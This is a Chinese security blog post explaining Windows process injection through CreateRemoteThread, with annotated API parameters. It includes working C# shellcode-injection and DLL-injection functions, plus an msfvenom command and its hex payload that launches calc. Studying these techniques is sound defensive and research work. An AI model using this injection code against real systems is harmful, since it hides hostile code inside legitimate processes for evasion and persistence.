<!doctype html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  
    
      
    

    
  

  
    
      
    

    
  

  

  
    
      
    

    
  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Monda:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|Lato:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="C#,Tools,知识回顾,">





  <link rel="alternate" href="/atom.xml" title="RcoIl的窝" type="application/atom+xml">




  <link rel="shortcut icon" type="image/x-icon" href="/images/favicon.png?v=5.1.0">






<meta name="description" content="通过 CreateRemoteThread API 进行代码与 DLL 注入。">
<meta name="keywords" content="C#,Tools,知识回顾">
<meta property="og:type" content="article">
<meta property="og:title" content="【知识回顾】进程注入-第一部分">
<meta property="og:url" content="https://rcoil.me/2019/09/【知识回顾】进程注入-第一部分/index.html">
<meta property="og:site_name" content="RcoIl的窝">
<meta property="og:description" content="通过 CreateRemoteThread API 进行代码与 DLL 注入。">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://rcoil.me/image/【知识回顾】进程注入-第一部分/CreateRemoteThread%20进程注入流程图.png">
<meta property="og:image" content="https://rcoil.me/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_15-56-38.png">
<meta property="og:image" content="https://rcoil.me/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_16-10-46.png">
<meta property="og:image" content="https://rcoil.me/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_16-33-57.png">
<meta property="og:image" content="https://rcoil.me/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_17-10-28.png">
<meta property="og:image" content="https://rcoil.me/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_18-02-31.png">
<meta property="og:updated_time" content="2019-10-31T15:42:06.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【知识回顾】进程注入-第一部分">
<meta name="twitter:description" content="通过 CreateRemoteThread API 进行代码与 DLL 注入。">
<meta name="twitter:image" content="https://rcoil.me/image/【知识回顾】进程注入-第一部分/CreateRemoteThread%20进程注入流程图.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    sidebar: {"position":"left","display":"always","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '6230266985318450000',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://rcoil.me/2019/09/【知识回顾】进程注入-第一部分/">





  <title> 【知识回顾】进程注入-第一部分 | RcoIl的窝 </title>
</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="zh-Hans">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ce3d1967864bac5f69f1c1a6042e5577";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">RcoIl的窝</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-count">
          <a href="/count" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-fa fa-free-code-camp"></i> <br>
            
            阅读榜
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocapitalize="off" autocomplete="off" autocorrect="off" placeholder="搜索..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope="" itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="https://rcoil.me/2019/09/【知识回顾】进程注入-第一部分/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="RcoIl">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RcoIl的窝">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                【知识回顾】进程注入-第一部分
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-09-01T14:37:56+08:00">
                2019-09-01
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope="" itemtype="http://schema.org/Thing">
                  <a href="/categories/编程之道/" itemprop="url" rel="index">
                    <span itemprop="name">编程之道</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2019/09/【知识回顾】进程注入-第一部分/" class="leancloud_visitors" data-flag-title="【知识回顾】进程注入-第一部分">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                <!--
				<i class="fa fa-eye"></i>
				-->
				<i class="fa fa-thermometer-three-quarters" aria-hidden="true"></i>
               </span>
               
                 <span class="post-meta-item-text">热度 </span>
               
                 <span class="leancloud-visitors-count"></span>
				 <span>℃</span>
             </span>
          

          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>通过 <code>CreateRemoteThread</code> API 进行代码与 DLL 注入。</p>
<a id="more"></a>
<h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p>某日看到收藏夹里头的 <a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" target="_blank" rel="noopener">Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques</a> ，里头总结得很到位，在国内的几个流行的安全媒体上也见过译文。</p>
<p>通过对进程注入技术的学习和理解，个人觉得整个过程非常有趣，故以此作为 C# 代码学习的方向（Windows API 利用），并编写有助于学习和开发的代码。</p>
<p><strong>注意： </strong>我不是第一个编写这样代码的人，Github 有一大堆代码示例。</p>
<h2 id="0x01-什么是进程注入"><a href="#0x01-什么是进程注入" class="headerlink" title="0x01 什么是进程注入"></a>0x01 什么是进程注入</h2><p>进程注入是一种广泛应用于恶意软件和无文件攻击中的逃避技术，这意味着可以将自定义代码运行在另一个进程的地址空间内。进程注入提高了隐蔽性，也实现了持久化。尽管有非常多的进程注入技术，本文所述是最常用的进程注入技术之一。</p>
<h2 id="0x02-VirtualAllocEx-gt-WriteProcessMemory-模式"><a href="#0x02-VirtualAllocEx-gt-WriteProcessMemory-模式" class="headerlink" title="0x02 VirtualAllocEx =&gt; WriteProcessMemory 模式"></a>0x02 <strong>VirtualAllocEx</strong> =&gt; <strong>WriteProcessMemory</strong> 模式</h2><p><code>CreateRemoteThread</code> 是 Win32 API 提供的一个函数，用于在另一个进程中创建线程。在另一个应用程序中创建线程之前，必须满足两个条件。</p>
<ul>
<li><p>尝试在另一个进程中创建线程的进程必须具有创建线程的权限。简单来说，必须有与目标进程相同或更高的权限（目标指的是我们想要创建线程的进程）</p>
</li>
<li><p>两个进程必须在同一会话中。如果会话标识符不匹配，则不会创建线程。</p>
</li>
</ul>
<p>如果不满足上述任何一个条件，则操作系统本身将拒绝代码注入这一过程。这不是 Windows 操作系统体系结构中的安全漏洞，而是由操作系统提供的功能。由于我们无法修改具有比我们更高权限的进程，因此不会跨越任何安全边界。</p>
<p>为了通过 <code>CreateRemoteThread</code> API 实现代码注入，我们遵循以下流程：</p>
<p><img src="/image/【知识回顾】进程注入-第一部分/CreateRemoteThread 进程注入流程图.png" alt=""></p>
<p>代码示意：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">public static void CodeInject(int pid, byte[] buf)</span><br><span class="line">&#123;</span><br><span class="line">    try</span><br><span class="line">    &#123;</span><br><span class="line">        uint lpNumberOfBytesWritten = 0;</span><br><span class="line">        uint lpThreadId = 0;</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 获取进程ID &#123;pid&#125; 的句柄.&quot;);</span><br><span class="line">        IntPtr pHandle = OpenProcess((uint)ProcessAccessRights.All, false, (uint)pid);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 打开进程id &#123; pid &#125; 的句柄 &#123;pHandle&#125;.&quot;);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 分配内存以注入shellcode.&quot;);</span><br><span class="line">        IntPtr rMemAddress = VirtualAllocEx(pHandle, IntPtr.Zero, (uint)buf.Length, (uint)MemAllocation.MEM_RESERVE | (uint)MemAllocation.MEM_COMMIT, (uint)MemProtect.PAGE_EXECUTE_READWRITE);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] Shellcode 的内存分配在 0x&#123;rMemAddress&#125;.&quot;);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 在已分配的内存位置写入shellcode&quot;);</span><br><span class="line">        if (WriteProcessMemory(pHandle, rMemAddress, buf, (uint)buf.Length, ref lpNumberOfBytesWritten))</span><br><span class="line">        &#123;</span><br><span class="line">            Console.WriteLine($&quot;  [&gt;] Shellcode写在进程内存中.&quot;);</span><br><span class="line">            Console.WriteLine($&quot;  [&gt;] 创建远程线程来注入 shellcode.&quot;);</span><br><span class="line">            IntPtr hRemoteThread = CreateRemoteThread(pHandle, IntPtr.Zero, 0, rMemAddress, IntPtr.Zero, 0, ref lpThreadId);</span><br><span class="line">            bool hCreateRemoteThreadClose = CloseHandle(hRemoteThread);</span><br><span class="line">            Console.WriteLine($&quot;  [&gt;] 成功将 shellcode 注入进程id &#123;pid&#125; 的内存中.&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        else</span><br><span class="line">        &#123;</span><br><span class="line">            Console.WriteLine($&quot;  [!] 无法将shellcode注入进程id &#123;pid&#125; 的内存中.&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        bool hOpenProcessClose = CloseHandle(pHandle);</span><br><span class="line">    &#125;</span><br><span class="line">    catch (Exception ex)</span><br><span class="line">    &#123;</span><br><span class="line">        Console.WriteLine(&quot;[+] &quot; + Marshal.GetExceptionCode());</span><br><span class="line">        Console.WriteLine(ex.Message);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><code>Cobalt Strike</code> 提供了两种在远程进程中分配内存并将数据复制到其中的选项，而其中默认使用项就是使用了 <strong>VirtualAllocEx</strong> -&gt; <strong>WriteProcessMemory</strong> 的经典模式，这模式也是红队工具中最常见的模式。此模式也适用于不同的进程体系结构。</p>
<p>当然，一个好的实现需要考虑到出现不同的极端情况，比如 x86 -&gt; x64， x64 -&gt; x86，不同上下文等，不过这不是本文的内容。</p>
<h2 id="0x03-深入了解函数"><a href="#0x03-深入了解函数" class="headerlink" title="0x03 深入了解函数"></a>0x03 深入了解函数</h2><h3 id="3-1-访问远程进程"><a href="#3-1-访问远程进程" class="headerlink" title="3.1 访问远程进程"></a>3.1 访问远程进程</h3><p>要对任何进程执行内存操作，我们必须能够访问到它。可以通过使用 <code>OpenProcess</code> 函数获得，该函数原型是：</p>
<p><img src="/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_15-56-38.png" alt=""></p>
<p>它需要 3 个参数：</p>
<ul>
<li><p><strong>DwDesiredAccess：</strong>对进程对象的请求访问权限。它将根据受害者进程的安全描述符进行检查。如果调用者启用了 <code>SeDebugPrivilege</code> 特权，则无论安全描述符的内容如何，都会授予所请求的访问权限。</p>
</li>
<li><p><strong>bInheritHandle：</strong>如果此值为 TRUE，则此进程创建的进程将继承该句柄。否则，进程不会继承此句柄。</p>
</li>
<li><strong>dwProcessId：</strong>这是受害者进程的进程标识符。</li>
</ul>
<p>如果函数成功，则返回值是指定进程的打开句柄，其他 API函数可以使用它来操作受害进程的内存。失败时，返回 NULL。</p>
<h3 id="3-2-为-shellcode-分配空间"><a href="#3-2-为-shellcode-分配空间" class="headerlink" title="3.2 为 shellcode 分配空间"></a>3.2 为 shellcode 分配空间</h3><p>一旦我们获得进程的句柄，我们继续为内存中的 shellcode 分配空间。这是通过使用 <code>VirtualAllocEx</code> API 调用完成的。</p>
<p><img src="/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_16-10-46.png" alt=""></p>
<p>它需要 5 个参数：</p>
<ul>
<li><strong>hProcess：</strong>进程的句柄。该函数在此进程的虚拟地址空间内分配内存。句柄必须具有<strong>PROCESS_VM_OPERATION</strong>访问权限。</li>
<li><strong>lpAddress：</strong>指向受害者进程内存中指定地址的指针。如果参数指定为 NULL，则该函数回自动选择要分配的内存页面。</li>
<li><strong>dwSize：</strong>要分配的内存区域的大小，它以字节为单位。</li>
<li><strong>flAllocationType：</strong>指定要分配的内存类型。此参数必须包含以下值之一。：MEM_COMMIT、MEM_RESERVE、MEM_RESET、MEM_RESET_UNDO。</li>
<li><strong>flProtect：</strong>要分配的页面区域的内存保护。出于我们的目的，它将包含我们要执行的代码，并且我们希望它可读可写，我们将其设置为 PAGE_EXECUTE_READWRITE。</li>
</ul>
<p>该函数在成功时返回分配的基址，而失败时，返回 NULL。</p>
<p>此时我们已经成功设法在进程中分配可执行内存。</p>
<h3 id="3-3-在远程进程中写入-shellcode"><a href="#3-3-在远程进程中写入-shellcode" class="headerlink" title="3.3 在远程进程中写入 shellcode"></a>3.3 在远程进程中写入 shellcode</h3><p>现在，我们需要在分配的区域中写入 shellcode。为此，我们有一个名为 <code>WriteProcessMemory</code> 的函数。</p>
<p><code>WriteProcessMemory</code> 是一个函数，它将调用者的数据写入指定进程的内存区域。需要注意的时整个内存区域必须时可写的，否则函数会失败，这就是为什么我们要将内存分配为可写，并与可读和可执行文件一起分配。</p>
<p><img src="/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_16-33-57.png" alt=""></p>
<p>它需要 5 个参数。</p>
<ul>
<li><strong>hProcess：</strong>要修改的进程内存的句柄。句柄必须具有 PROCESS_VM_WRITE 和 PROCESS_VM_OPERATION 访问权限。</li>
<li><strong>lpBaseAddress：</strong>指向写入数据的指定进程中的基址的指针（我们想要写入数据的地址）。在发生数据传输之前，系统会验证指定大小的基址和内存中的所有数据是否都可以进行写访问，如果无法访问，则该函数将失败。</li>
<li><strong>lpBuffer：</strong>指向缓冲区的指针，指针补习时const指针。该缓冲区包含要在指定进程的地址空间中写入的数据。</li>
<li><strong>nSize：</strong>要写入指定进程的字节数。</li>
<li><strong>lpNumberOfBytesWritten：</strong>指向变量的指针，该变量接收传输到指定进程的字节数。此参数是可选的。如果 <em>lpNumberOfBytesWritten</em> 为 <strong>NULL</strong>，则忽略该参数。</li>
</ul>
<p>如果函数由于某些原因而失败，则返回 false，如果成功则返回 true。</p>
<p>此时，stage 已全部设置，所需的只是在远程进程中创建一个线程并运行它。</p>
<h3 id="3-4-执行-shellcode"><a href="#3-4-执行-shellcode" class="headerlink" title="3.4 执行 shellcode"></a>3.4 执行 shellcode</h3><p>为了在远程进程中创建线程，我们使用 Win32 API 提供的 <code>CreateRemoteThread</code> 函数。</p>
<p><img src="/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_17-10-28.png" alt=""></p>
<p>它需要 7 个参数，其中只有 3 个是我们感兴趣的。其余的可以通过调整它们获得默认值，可以对新创建的线程进行更多控制。</p>
<p>我们感兴趣的参数是：</p>
<ul>
<li><strong>hProcess：</strong>要创建线程的进程的句柄。</li>
<li><strong>lpStartAddress：</strong>它是指向 <em>THREADSTARTROUTINE</em> 的指针，THREADSTARTROUTINE 是线程创建后开始执行代码的位置。</li>
<li><strong>lpParameter：</strong>指向 <em>LPTHREAD_START_ROUTINE</em> 所需参数的指针。因为在这种情况下，它是一个普通的shellcode，它不期望任何参数，因此，我们将它保持为 NULL 。此参数在 DLL 注入中具有价值。</li>
</ul>
<h2 id="0x04-演示"><a href="#0x04-演示" class="headerlink" title="0x04 演示"></a>0x04 演示</h2><p>利用 msfvenom 生成 shellcode</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">rcoil@MacBookPro  ~  msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -b "\x00" -f hex</span><br><span class="line">[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload</span><br><span class="line">[-] No arch selected, selecting arch: x64 from the payload</span><br><span class="line">Found 3 compatible encoders</span><br><span class="line">Attempting to encode payload <span class="keyword">with</span> <span class="number">1</span> iterations <span class="keyword">of</span> generic/<span class="keyword">none</span></span><br><span class="line">generic/<span class="keyword">none</span> <span class="keyword">failed</span> <span class="keyword">with</span> <span class="keyword">Encoding</span> <span class="keyword">failed</span> due <span class="keyword">to</span> a bad <span class="built_in">character</span> (<span class="keyword">index</span>=<span class="number">7</span>, <span class="built_in">char</span>=<span class="number">0x00</span>)</span><br><span class="line">Attempting <span class="keyword">to</span> <span class="keyword">encode</span> payload <span class="keyword">with</span> <span class="number">1</span> iterations <span class="keyword">of</span> x64/<span class="keyword">xor</span></span><br><span class="line">x64/<span class="keyword">xor</span> succeeded <span class="keyword">with</span> <span class="keyword">size</span> <span class="number">311</span> (iteration=<span class="number">0</span>)</span><br><span class="line">x64/<span class="keyword">xor</span> chosen <span class="keyword">with</span> <span class="keyword">final</span> <span class="keyword">size</span> <span class="number">311</span></span><br><span class="line">Payload <span class="keyword">size</span>: <span class="number">311</span> <span class="keyword">bytes</span></span><br><span class="line"><span class="keyword">Final</span> <span class="keyword">size</span> <span class="keyword">of</span> <span class="keyword">hex</span> <span class="keyword">file</span>: <span class="number">622</span> <span class="keyword">bytes</span></span><br><span class="line"><span class="number">4831</span>c94881e9deffffff488d05efffffff48bbc690bbfdf6dbd2a448315827482df8ffffffe2f43ad83819063312a4c690faacb78b80f590d88a2f939359f6a6d830afee9359f6e6d8308fa693dd138cdaf6cc3f93e3646aacda81f4f7f2e50759b6bcf71a304994d1eab57d89f22f84acf3fc2650522cc690bbb5731ba6c38e916bad7d93cae04dd09bb4f70b31f28e6f72bc7def5aecc746f6cc3f93e3646ad17a34fb9ad365fe70ce0cbad89e80ced5822c83038ae04dd09fb4f70bb4e54d9cf3b97d9bceedc740fa76f2539aa516d1e3bcae858bfe87c8faa4b7819a272ab0faaf093b8ae59fcaf376e432855b396fe6b54cdad2a4c690bbfdf6935f29c791bbfdb761e32fa91744284d3bcf8eccd1015b63664f5b13d83839dee7d4d8cc10401d83de69e3d5e2d497f682932d1c6f6e9e97b7b1a4</span><br></pre></td></tr></table></figure>
<p>运行结果：</p>
<p><img src="/image/【知识回顾】进程注入-第一部分/blog_2019-09-02_18-02-31.png" alt=""></p>
<h2 id="0x05-DLL-注入"><a href="#0x05-DLL-注入" class="headerlink" title="0x05 DLL 注入"></a>0x05 DLL 注入</h2><h3 id="5-1-什么是DLL？"><a href="#5-1-什么是DLL？" class="headerlink" title="5.1 什么是DLL？"></a>5.1 什么是DLL？</h3><p>动态链接库（DLL）是一个包含代码的文件，程序已加载该文件以在运行时执行一个或多个操作。</p>
<h3 id="5-2-什么是DLL注入？"><a href="#5-2-什么是DLL注入？" class="headerlink" title="5.2 什么是DLL注入？"></a>5.2 什么是DLL注入？</h3><p>DLL 注入是一个将 DLL 注入到正在运行中的进程的过程，该进程可能包含恶意代码，可用于执行恶意活动。</p>
<h3 id="5-3-相关函数"><a href="#5-3-相关函数" class="headerlink" title="5.3 相关函数"></a>5.3 相关函数</h3><ul>
<li><a href="https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getmodulehandlea" target="_blank" rel="noopener">GetModuleHandleA</a> ：检索已由调用进程加载的指定模块的模块句柄。</li>
<li><a href="https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-getprocaddress" target="_blank" rel="noopener">GetProcAddress</a> ：从指定的动态链接库（DLL）中检索导出的函数或变量的地址。</li>
</ul>
<h3 id="5-4-示例代码"><a href="#5-4-示例代码" class="headerlink" title="5.4 示例代码"></a>5.4 示例代码</h3><p>DLL 注入，只需要在上面的基础上引入 <code>LoadLibrary</code> 即可。</p>
<p>代码部分只需要修改以下内容即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">public static void DLLInject(int pid, byte[] buf)</span><br><span class="line">&#123;</span><br><span class="line">    try</span><br><span class="line">    &#123;</span><br><span class="line">        uint lpNumberOfBytesWritten = 0;</span><br><span class="line">        uint lpThreadId = 0;</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 获取进程ID &#123;pid&#125; 的句柄.&quot;);</span><br><span class="line">        IntPtr pHandle = OpenProcess((uint)ProcessAccessRights.All, false, (uint)pid);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 打开进程id &#123; pid &#125; 的句柄 &#123;pHandle&#125;.&quot;);</span><br><span class="line">        IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandleA(&quot;kernel32.dll&quot;), &quot;LoadLibraryA&quot;);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] LoadLibraryA 的导出函数地址是 &#123;loadLibraryAddr&#125; .&quot;);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 分配 DLL 路径的内存.&quot;);</span><br><span class="line">        IntPtr rMemAddress = VirtualAllocEx(pHandle, IntPtr.Zero, (uint)buf.Length, (uint)MemAllocation.MEM_RESERVE | (uint)MemAllocation.MEM_COMMIT, (uint)MemProtect.PAGE_EXECUTE_READWRITE);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 注入 DLL 路径的内存分配在 0x&#123;rMemAddress&#125;.&quot;);</span><br><span class="line">        Console.WriteLine($&quot;  [&gt;] 在已分配的内存位置写入 DLL 路径.&quot;);</span><br><span class="line">        if (WriteProcessMemory(pHandle, rMemAddress, buf, (uint)buf.Length, ref lpNumberOfBytesWritten))</span><br><span class="line">        &#123;</span><br><span class="line">            Console.WriteLine($&quot;  [&gt;] DLL 路径写在目标进程内存中.&quot;);</span><br><span class="line">            Console.WriteLine($&quot;  [&gt;] 创建远程线程来注入 DLL.&quot;);</span><br><span class="line">            IntPtr hRemoteThread = CreateRemoteThread(pHandle, IntPtr.Zero, 0, loadLibraryAddr, rMemAddress, 0, ref lpThreadId);</span><br><span class="line">            bool hCreateRemoteThreadClose = CloseHandle(hRemoteThread);</span><br><span class="line">            Console.WriteLine($&quot;[&gt;] 成功将 DLL 注入进程id &#123;pid&#125; 的内存中.&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        else</span><br><span class="line">        &#123;</span><br><span class="line">            Console.WriteLine($&quot;  [!] 无法将 DLL 注入进程id &#123;pid&#125; 的内存中.&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        bool hOpenProcessClose = CloseHandle(pHandle);</span><br><span class="line">    &#125;</span><br><span class="line">    catch (Exception ex)</span><br><span class="line">    &#123;</span><br><span class="line">        Console.WriteLine(&quot;[+] &quot; + Marshal.GetExceptionCode());</span><br><span class="line">        Console.WriteLine(ex.Message);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<h2 id="0x06-来源参考"><a href="#0x06-来源参考" class="headerlink" title="0x06 来源参考"></a>0x06 来源参考</h2><p><a href="https://3xpl01tc0d3r.blogspot.com/2019/08/process-injection-part-i.html" target="_blank" rel="noopener">https://3xpl01tc0d3r.blogspot.com/2019/08/process-injection-part-i.html</a></p>
<p><a href="https://pwnrip.com/demystifying-code-injection-techniques-part-1-shellcode-injection/" target="_blank" rel="noopener">https://pwnrip.com/demystifying-code-injection-techniques-part-1-shellcode-injection/</a></p>
<p><a href="https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/" target="_blank" rel="noopener">https://blog.cobaltstrike.com/2019/08/21/cobalt-strikes-process-injection-the-details/</a></p>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        
  <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
	
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/知识星球.jpeg" alt="RcoIl Alipay">
        </div>
    
  
    <div>！坚持技术分享，您的支持将鼓励我继续创作！</div>
    <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
      <span>赏</span>
    </button>
    <div id="QR" style="display: none;">
      
        <div id="wechat" style="display: inline-block">
          <img id="wechat_qr" src="/images/wechatpay.jpg" alt="RcoIl WeChat Pay">
          <p>微信打赏</p>
        </div>
      
      
        <div id="alipay" style="display: inline-block">
          <img id="alipay_qr" src="/images/知识星球.jpeg" alt="RcoIl Alipay">
          <p>知识星球</p>
        </div>
      
    </div>
  </div>


      
    </div>

    <div>
      
        
  <ul class="post-copyright">
    <li class="post-copyright-author">
      <strong>嘤嘤怪：</strong>
      RcoIl
    </li>
    <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://rcoil.me/2019/09/【知识回顾】进程注入-第一部分/" title="【知识回顾】进程注入-第一部分">https://rcoil.me/2019/09/【知识回顾】进程注入-第一部分/</a>
